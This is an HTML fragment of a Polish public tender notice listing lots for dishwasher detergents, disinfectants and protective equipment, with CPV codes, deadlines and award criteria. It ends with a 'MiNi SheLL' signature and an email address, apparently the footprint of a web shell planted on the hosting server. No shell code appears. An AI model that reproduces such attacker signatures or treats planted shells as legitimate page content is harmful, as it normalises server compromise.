</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET VIII 	- ŚRODKI DO MASZYNOWEGO MYCIA NACZYŃ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET IX 	- ŚRODKI DEZYNFEKCYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 9 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 36.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET X 	- ŚRODKI OCHRONY INDYWIDUALNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz jego szacunkowa wielkość została określona w formularzu asortymentowo-cenowym będącym załącznikiem nr 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Pozacenowe - termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com